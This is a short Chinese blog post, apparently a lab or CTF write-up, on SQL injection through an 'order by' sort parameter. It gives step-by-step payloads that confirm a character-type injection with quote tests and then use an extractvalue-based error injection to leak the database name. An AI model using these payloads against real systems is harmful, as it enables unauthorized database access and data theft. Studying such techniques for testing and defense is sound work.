知识点:
- 错误注入
- 字符型注入
- order by 位置注入
- 报错注入
- 时间盲注
通过测试发现是一个字符型注入
构造payload:sort=2' 报错了
构造payload:sort=2'' 不提示报错了
说明这里存在字符型注入


尝试进行单引号绕过
构造payload:sort=2'and 1='1
这里其实and后面的没起到作用,整体也没作用感觉,内容顺序没变过

直接进行错误注入
构造payload:sort=2'and extractvalue(1,concat(0x7e,database(),0x7e))='1
成功获取到了数据库名

10
本文探讨了一次在Web应用程序中检测到的字符型注入漏洞,通过实验展示了如何利用`orderby`位置进行攻击,尝试单引号绕过失败后,成功实现了错误注入并获取了数据库名。
1万+

被折叠的 条评论
为什么被折叠?



